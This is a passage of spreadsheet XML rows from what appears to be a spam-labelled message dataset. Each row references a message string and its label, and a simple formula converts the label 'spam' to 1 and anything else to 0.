    <row r="4883" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4883" t="s">
        <v>9850</v>
      </c>
      <c r="B4883" t="s">
        <v>5294</v>
      </c>
      <c r="C4883" s="1">
        <f>IF(B4883="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4884" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4884" t="s">
        <v>5530</v>
      </c>
      <c r="B4884" t="s">
        <v>5294</v>
      </c>
      <c r="C4884" s="1">
        <f>IF(B4884="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4885" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4885" t="s">
        <v>9851</v>
      </c>
      <c r="B4885" t="s">
        <v>5294</v>
      </c>
      <c r="C4885" s="1">
        <f>IF(B4885="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4886" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4886" t="s">
        <v>9852</v>
      </c>
      <c r="B4886" t="s">
        <v>5294</v>
      </c>
      <c r="C4886" s="1">
        <f>IF(B4886="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4887" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4887" t="s">
        <v>9853</v>
      </c>
      <c r="B4887" t="s">
        <v>5294</v>
      </c>
      <c r="C4887" s="1">
        <f>IF(B4887="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4888" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4888" t="s">
        <v>5916</v>
      </c>
      <c r="B4888" t="s">
        <v>5297</v>
      </c>
      <c r="C4888" s="1">
        <f>IF(B4888="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4889" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4889" t="s">
        <v>9854</v>
      </c>
      <c r="B4889" t="s">
        <v>5294</v>
      </c>
      <c r="C4889" s="1">
        <f>IF(B4889="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4890" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4890" t="s">
        <v>8015</v>
      </c>
      <c r="B4890" t="s">
        <v>5294</v>
      </c>
      <c r="C4890" s="1">
        <f>IF(B4890="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4891" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4891" t="s">
        <v>9855</v>
      </c>
      <c r="B4891" t="s">
        <v>5294</v>
      </c>
      <c r="C4891" s="1">
        <f>IF(B4891="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4892" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4892" t="s">
        <v>9856</v>
      </c>
      <c r="B4892" t="s">
        <v>5294</v>
      </c>
      <c r="C4892" s="1">
        <f>IF(B4892="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4893" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4893" t="s">
        <v>9857</v>
      </c>
      <c r="B4893" t="s">
        <v>5294</v>
      </c>
      <c r="C4893" s="1">
        <f>IF(B4893="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4894" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4894" t="s">
        <v>9858</v>
      </c>
      <c r="B4894" t="s">
        <v>5294</v>
      </c>
      <c r="C4894" s="1">
        <f>IF(B4894="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4895" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4895" t="s">
        <v>6349</v>
      </c>
      <c r="B4895" t="s">
        <v>5294</v>
      </c>
      <c r="C4895" s="1">
        <f>IF(B4895="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4896" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4896" t="s">
        <v>9859</v>
      </c>
      <c r="B4896" t="s">
        <v>5297</v>
      </c>
      <c r="C4896" s="1">
        <f>IF(B4896="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4897" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4897" t="s">
        <v>9860</v>
      </c>
      <c r="B4897" t="s">
        <v>5294</v>
      </c>
      <c r="C4897" s="1">
        <f>IF(B4897="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4898" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4898" t="s">
        <v>5590</v>
      </c>
      <c r="B4898" t="s">
        <v>5294</v>
      </c>
      <c r="C4898" s="1">
        <f>IF(B4898="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4899" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4899" t="s">
        <v>9861</v>
      </c>
      <c r="B4899" t="s">
        <v>5294</v>
      </c>
      <c r="C4899" s="1">
        <f>IF(B4899="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4900" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4900" t="s">
        <v>9862</v>
      </c>
      <c r="B4900" t="s">
        <v>5294</v>
      </c>
      <c r="C4900" s="1">
        <f>IF(B4900="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4901" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4901" t="s">
        <v>9863</v>
      </c>
      <c r="B4901" t="s">
        <v>5297</v>
      </c>
      <c r="C4901" s="1">
        <f>IF(B4901="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4902" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4902" t="s">
        <v>9864</v>
      </c>
      <c r="B4902" t="s">
        <v>5294</v>
      </c>
      <c r="C4902" s="1">
        <f>IF(B4902="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4903" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4903" t="s">
        <v>9865</v>
      </c>
      <c r="B4903" t="s">
        <v>5297</v>
      </c>
      <c r="C4903" s="1">
        <f>IF(B4903="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4904" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4904" t="s">
        <v>9866</v>
      </c>
      <c r="B4904" t="s">
        <v>5294</v>
      </c>
      <c r="C4904" s="1">
        <f>IF(B4904="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4905" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4905" t="s">
        <v>9867</v>
      </c>
      <c r="B4905" t="s">
        <v>5294</v>
      </c>
      <c r="C4905" s="1">
        <f>IF(B4905="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4906" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4906" t="s">
        <v>9868</v>
      </c>
      <c r="B4906" t="s">
        <v>5297</v>
      </c>
      <c r="C4906" s="1">
        <f>IF(B4906="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4907" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4907" t="s">
        <v>9869</v>
      </c>
      <c r="B4907" t="s">
        <v>5294</v>
      </c>
      <c r="C4907" s="1">
        <f>IF(B4907="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4908" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4908" t="s">
        <v>9870</v>
      </c>
      <c r="B4908" t="s">
        <v>5294</v>
      </c>
      <c r="C4908" s="1">
        <f>IF(B4908="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4909" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4909" t="s">
        <v>9871</v>
      </c>
      <c r="B4909" t="s">
        <v>5294</v>
      </c>
      <c r="C4909" s="1">
        <f>IF(B4909="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4910" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4910" t="s">
        <v>9872</v>
      </c>
      <c r="B4910" t="s">
        <v>5294</v>
      </c>
      <c r="C4910" s="1">
        <f>IF(B4910="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4911" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4911" t="s">
        <v>9873</v>
      </c>
      <c r="B4911" t="s">
        <v>5294</v>
      </c>
      <c r="C4911" s="1">
        <f>IF(B4911="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4912" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4912" t="s">
        <v>9874</v>
      </c>
      <c r="B4912" t="s">
        <v>5294</v>
      </c>
      <c r="C4912" s="1">
        <f>IF(B4912="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4913" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4913" t="s">
        <v>9875</v>
      </c>
      <c r="B4913" t="s">
        <v>5294</v>
      </c>
      <c r="C4913" s="1">
        <f>IF(B4913="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4914" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4914" t="s">
        <v>9876</v>
      </c>
      <c r="B4914" t="s">
        <v>5297</v>
      </c>
      <c r="C4914" s="1">
        <f>IF(B4914="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4915" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4915" t="s">
        <v>9877</v>
      </c>
      <c r="B4915" t="s">
        <v>5294</v>
      </c>
      <c r="C4915" s="1">
        <f>IF(B4915="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4916" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4916" t="s">
        <v>9878</v>
      </c>
      <c r="B4916" t="s">
        <v>5294</v>
      </c>
      <c r="C4916" s="1">
        <f>IF(B4916="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4917" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4917" t="s">
        <v>9879</v>
      </c>
      <c r="B4917" t="s">
        <v>5294</v>
      </c>
      <c r="C4917" s="1">
        <f>IF(B4917="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4918" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4918" t="s">
        <v>8314</v>
      </c>
      <c r="B4918" t="s">
        <v>5297</v>
      </c>
      <c r="C4918" s="1">
        <f>IF(B4918="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4919" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4919" t="s">
        <v>9880</v>
      </c>
      <c r="B4919" t="s">
        <v>5294</v>
      </c>
      <c r="C4919" s="1">
        <f>IF(B4919="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4920" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4920" t="s">
        <v>9881</v>
      </c>
      <c r="B4920" t="s">
        <v>5294</v>
      </c>
      <c r="C4920" s="1">
        <f>IF(B4920="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4921" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4921" t="s">
        <v>9882</v>
      </c>
      <c r="B4921" t="s">
        <v>5294</v>
      </c>
      <c r="C4921" s="1">
        <f>IF(B4921="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4922" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4922" t="s">
        <v>9883</v>
      </c>
      <c r="B4922" t="s">
        <v>5294</v>
      </c>
      <c r="C4922" s="1">
        <f>IF(B4922="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4923" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4923" t="s">
        <v>6870</v>
      </c>
      <c r="B4923" t="s">
        <v>5294</v>
      </c>
      <c r="C4923" s="1">
        <f>IF(B4923="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4924" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4924" t="s">
        <v>9884</v>
      </c>
      <c r="B4924" t="s">
        <v>5294</v>
      </c>
      <c r="C4924" s="1">
        <f>IF(B4924="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4925" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4925" t="s">
        <v>9885</v>
      </c>
      <c r="B4925" t="s">
        <v>5294</v>
      </c>
      <c r="C4925" s="1">
        <f>IF(B4925="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4926" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4926" t="s">
        <v>9886</v>
      </c>
      <c r="B4926" t="s">
        <v>5294</v>
      </c>
      <c r="C4926" s="1">
        <f>IF(B4926="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4927" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4927" t="s">
        <v>9887</v>
      </c>
      <c r="B4927" t="s">
        <v>5294</v>
      </c>
      <c r="C4927" s="1">
        <f>IF(B4927="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4928" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4928" t="s">
        <v>9888</v>
      </c>
      <c r="B4928" t="s">
        <v>5294</v>
      </c>
      <c r="C4928" s="1">
        <f>IF(B4928="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4929" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4929" t="s">
        <v>9889</v>
      </c>
      <c r="B4929" t="s">
        <v>5294</v>
      </c>
      <c r="C4929" s="1">
        <f>IF(B4929="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4930" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4930" t="s">
        <v>6435</v>
      </c>
      <c r="B4930" t="s">
        <v>5297</v>
      </c>
      <c r="C4930" s="1">
        <f>IF(B4930="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4931" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4931" t="s">
        <v>9890</v>
      </c>
      <c r="B4931" t="s">
        <v>5297</v>
      </c>
      <c r="C4931" s="1">
        <f>IF(B4931="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4932" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4932" t="s">
        <v>9891</v>
      </c>
      <c r="B4932" t="s">
        <v>5294</v>
      </c>
      <c r="C4932" s="1">
        <f>IF(B4932="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4933" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4933" t="s">
        <v>9892</v>
      </c>
      <c r="B4933" t="s">
        <v>5294</v>
      </c>
      <c r="C4933" s="1">
        <f>IF(B4933="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4934" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4934" t="s">
        <v>9893</v>
      </c>
      <c r="B4934" t="s">
        <v>5294</v>
      </c>
      <c r="C4934" s="1">
        <f>IF(B4934="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4935" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4935" t="s">
        <v>9894</v>
      </c>
      <c r="B4935" t="s">
        <v>5294</v>
      </c>
      <c r="C4935" s="1">
        <f>IF(B4935="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4936" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4936" t="s">
        <v>9895</v>
      </c>
      <c r="B4936" t="s">
        <v>5294</v>
      </c>
      <c r="C4936" s="1">
        <f>IF(B4936="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4937" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4937" t="s">
        <v>9896</v>
      </c>
      <c r="B4937" t="s">
        <v>5294</v>
      </c>
      <c r="C4937" s="1">
        <f>IF(B4937="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4938" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4938" t="s">
        <v>9897</v>
      </c>
      <c r="B4938" t="s">
        <v>5294</v>
      </c>
      <c r="C4938" s="1">
        <f>IF(B4938="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4939" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4939" t="s">
        <v>9898</v>
      </c>
      <c r="B4939" t="s">
        <v>5294</v>
      </c>
      <c r="C4939" s="1">
        <f>IF(B4939="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4940" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4940" t="s">
        <v>9899</v>
      </c>
      <c r="B4940" t="s">
        <v>5294</v>
      </c>
      <c r="C4940" s="1">
        <f>IF(B4940="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4941" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4941" t="s">
        <v>9900</v>
      </c>
      <c r="B4941" t="s">
        <v>5294</v>
      </c>
      <c r="C4941" s="1">
        <f>IF(B4941="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4942" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4942" t="s">
        <v>9901</v>
      </c>
      <c r="B4942" t="s">
        <v>5294</v>
      </c>
      <c r="C4942" s="1">
        <f>IF(B4942="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4943" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4943" t="s">
        <v>9902</v>
      </c>
      <c r="B4943" t="s">
        <v>5294</v>
      </c>
      <c r="C4943" s="1">
        <f>IF(B4943="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4944" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4944" t="s">
        <v>9903</v>
      </c>
      <c r="B4944" t="s">
        <v>5294</v>
      </c>
      <c r="C4944" s="1">
        <f>IF(B4944="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4945" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4945" t="s">
        <v>9904</v>
      </c>
      <c r="B4945" t="s">
        <v>5294</v>
      </c>
      <c r="C4945" s="1">
        <f>IF(B4945="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4946" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4946" t="s">
        <v>9905</v>
      </c>
      <c r="B4946" t="s">
        <v>5294</v>
      </c>
      <c r="C4946" s="1">
        <f>IF(B4946="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4947" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4947" t="s">
        <v>9906</v>
      </c>
      <c r="B4947" t="s">
        <v>5294</v>
      </c>
      <c r="C4947" s="1">
        <f>IF(B4947="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4948" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4948" t="s">
        <v>7234</v>
      </c>
      <c r="B4948" t="s">
        <v>5297</v>
      </c>
      <c r="C4948" s="1">
        <f>IF(B4948="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4949" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4949" t="s">
        <v>9907</v>
      </c>
      <c r="B4949" t="s">
        <v>5297</v>
      </c>
      <c r="C4949" s="1">
        <f>IF(B4949="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4950" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4950" t="s">
        <v>9908</v>
      </c>
      <c r="B4950" t="s">
        <v>5294</v>
      </c>
      <c r="C4950" s="1">
        <f>IF(B4950="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4951" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4951" t="s">
        <v>9909</v>
      </c>
      <c r="B4951" t="s">
        <v>5294</v>
      </c>
      <c r="C4951" s="1">
        <f>IF(B4951="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4952" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4952" t="s">
        <v>9910</v>
      </c>
      <c r="B4952" t="s">
        <v>5294</v>
      </c>
      <c r="C4952" s="1">
        <f>IF(B4952="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4953" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4953" t="s">
        <v>9911</v>
      </c>
      <c r="B4953" t="s">
        <v>5297</v>
      </c>
      <c r="C4953" s="1">
        <f>IF(B4953="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4954" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4954" t="s">
        <v>9912</v>
      </c>
      <c r="B4954" t="s">
        <v>5294</v>
      </c>
      <c r="C4954" s="1">
        <f>IF(B4954="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4955" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4955" t="s">
        <v>9913</v>
      </c>
      <c r="B4955" t="s">
        <v>5294</v>
      </c>
      <c r="C4955" s="1">
        <f>IF(B4955="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4956" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4956" t="s">
        <v>9914</v>
      </c>
      <c r="B4956" t="s">
        <v>5294</v>
      </c>
      <c r="C4956" s="1">
        <f>IF(B4956="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4957" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4957" t="s">
        <v>9915</v>
      </c>
      <c r="B4957" t="s">
        <v>5294</v>
      </c>
      <c r="C4957" s="1">
        <f>IF(B4957="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4958" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4958" t="s">
        <v>9916</v>
      </c>
      <c r="B4958" t="s">
        <v>5294</v>
      </c>
      <c r="C4958" s="1">
        <f>IF(B4958="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4959" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4959" t="s">
        <v>9917</v>
      </c>
      <c r="B4959" t="s">
        <v>5294</v>
      </c>
      <c r="C4959" s="1">
        <f>IF(B4959="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4960" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4960" t="s">
        <v>9918</v>
      </c>
      <c r="B4960" t="s">
        <v>5294</v>
      </c>
      <c r="C4960" s="1">
        <f>IF(B4960="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4961" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4961" t="s">
        <v>9919</v>
      </c>
      <c r="B4961" t="s">
        <v>5294</v>
      </c>
      <c r="C4961" s="1">
        <f>IF(B4961="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4962" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4962" t="s">
        <v>8826</v>
      </c>
      <c r="B4962" t="s">
        <v>5294</v>
      </c>
      <c r="C4962" s="1">
        <f>IF(B4962="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4963" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4963" t="s">
        <v>7719</v>
      </c>
      <c r="B4963" t="s">
        <v>5294</v>
      </c>
      <c r="C4963" s="1">
        <f>IF(B4963="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4964" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4964" t="s">
        <v>9920</v>
      </c>
      <c r="B4964" t="s">
        <v>5294</v>
      </c>
      <c r="C4964" s="1">
        <f>IF(B4964="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4965" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4965" t="s">
        <v>9921</v>
      </c>
      <c r="B4965" t="s">
        <v>5297</v>
      </c>
      <c r="C4965" s="1">
        <f>IF(B4965="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4966" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4966" t="s">
        <v>9922</v>
      </c>
      <c r="B4966" t="s">
        <v>5294</v>
      </c>
      <c r="C4966" s="1">
        <f>IF(B4966="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4967" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4967" t="s">
        <v>9923</v>
      </c>
      <c r="B4967" t="s">
        <v>5297</v>
      </c>
      <c r="C4967" s="1">
        <f>IF(B4967="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4968" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4968" t="s">
        <v>9924</v>
      </c>
      <c r="B4968" t="s">
        <v>5297</v>
      </c>
      <c r="C4968" s="1">
        <f>IF(B4968="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4969" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4969" t="s">
        <v>9925</v>
      </c>
      <c r="B4969" t="s">
        <v>5294</v>
      </c>
      <c r="C4969" s="1">
        <f>IF(B4969="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4970" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4970" t="s">
        <v>9926</v>
      </c>
      <c r="B4970" t="s">
        <v>5294</v>
      </c>
      <c r="C4970" s="1">
        <f>IF(B4970="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4971" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4971" t="s">
        <v>9927</v>
      </c>
      <c r="B4971" t="s">
        <v>5294</v>
      </c>
      <c r="C4971" s="1">
        <f>IF(B4971="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4972" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4972" t="s">
        <v>9928</v>
      </c>
      <c r="B4972" t="s">
        <v>5294</v>
      </c>
      <c r="C4972" s="1">
        <f>IF(B4972="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4973" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4973" t="s">
        <v>9929</v>
      </c>
      <c r="B4973" t="s">
        <v>5294</v>
      </c>
      <c r="C4973" s="1">
        <f>IF(B4973="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4974" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4974" t="s">
        <v>9930</v>
      </c>
      <c r="B4974" t="s">
        <v>5294</v>
      </c>
      <c r="C4974" s="1">
        <f>IF(B4974="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4975" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4975" t="s">
        <v>9931</v>
      </c>
      <c r="B4975" t="s">
        <v>5294</v>
      </c>
      <c r="C4975" s="1">
        <f>IF(B4975="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4976" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4976" t="s">
        <v>9932</v>
      </c>
      <c r="B4976" t="s">
        <v>5294</v>
      </c>
      <c r="C4976" s="1">
        <f>IF(B4976="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4977" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4977" t="s">
        <v>9933</v>
      </c>
      <c r="B4977" t="s">
        <v>5294</v>
      </c>
      <c r="C4977" s="1">
        <f>IF(B4977="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4978" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4978" t="s">
        <v>7412</v>
      </c>
      <c r="B4978" t="s">
        <v>5294</v>
      </c>
      <c r="C4978" s="1">
        <f>IF(B4978="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4979" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4979" t="s">
        <v>9934</v>
      </c>
      <c r="B4979" t="s">
        <v>5294</v>
      </c>
      <c r="C4979" s="1">
        <f>IF(B4979="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4980" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4980" t="s">
        <v>9935</v>
      </c>
      <c r="B4980" t="s">
        <v>5294</v>
      </c>
      <c r="C4980" s="1">
        <f>IF(B4980="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4981" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4981" t="s">
        <v>9936</v>
      </c>
      <c r="B4981" t="s">
        <v>5294</v>
      </c>
      <c r="C4981" s="1">
        <f>IF(B4981="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4982" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4982" t="s">
        <v>9937</v>
      </c>
      <c r="B4982" t="s">
        <v>5294</v>
      </c>
      <c r="C4982" s="1">
        <f>IF(B4982="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4983" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4983" t="s">
        <v>9938</v>
      </c>
      <c r="B4983" t="s">
        <v>5294</v>
      </c>
      <c r="C4983" s="1">
        <f>IF(B4983="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4984" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4984" t="s">
        <v>9939</v>
      </c>
      <c r="B4984" t="s">
        <v>5294</v>
      </c>
      <c r="C4984" s="1">
        <f>IF(B4984="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
    <row r="4985" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4985" t="s">
        <v>9940</v>
      </c>
      <c r="B4985" t="s">
        <v>5297</v>
      </c>
      <c r="C4985" s="1">
        <f>IF(B4985="spam",1,0)</f>
        <v>1</v>
      </c>
    </row>
    <row r="4986" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4986" t="s">
        <v>9941</v>
      </c>
      <c r="B4986" t="s">
        <v>5294</v>
      </c>
      <c r="C4986" s="1">
        <f>IF(B4986="spam",1,0)</f>
        <v>0</v>
      </c>
    </row>
